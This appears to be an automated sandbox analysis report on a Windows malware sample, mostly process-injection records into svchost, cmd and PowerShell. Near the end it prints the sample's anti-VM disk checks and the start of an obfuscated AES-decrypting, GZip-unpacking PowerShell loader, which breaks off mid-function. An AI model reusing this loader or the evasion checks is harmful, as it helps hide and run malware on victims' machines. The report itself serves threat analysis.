Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1430000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: EA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1520000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 940000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 410000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2527DEB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC29790000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25235280000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21EC07B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 286D7CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D547800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19192FE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 19193100000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BC05B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1DAF1910000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2127EAE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 176E8750000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000
Source: C:\Windows\System32\lsass.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735C40000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 